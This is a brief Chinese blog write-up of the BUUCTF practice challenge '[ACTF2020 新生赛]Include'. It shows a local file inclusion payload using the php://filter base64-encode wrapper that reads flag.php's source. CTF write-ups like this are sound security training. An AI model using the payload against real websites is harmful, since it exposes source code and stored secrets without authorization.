buu刷题笔记
[ACTF2020 新生赛]Include
进入靶场环境:
http://3ff0893f-e04a-41e6-87ad-a39b1889535e.node3.buuoj.cn/

然后就啥也没了,但是url中有 ?file=flag.php 猜测文件包含漏洞,尝试文件包含直接读取的是文件,而不是文件源码,所以要想办法读取源码
php://filter/read=convert.base64-encode/resource=xxx.php 这个方法可以读取代码 然后构造playload:
?file=php://filter/read=convert.base64-encode/resource=flag.php
得到字符串 base64解密 得到flag
本文来自博客园,作者:guoyuxin3,转载请注明原文链接:https://www.cnblogs.com/guoyuxin3/p/15217026.html

浙公网安备 33010602011771号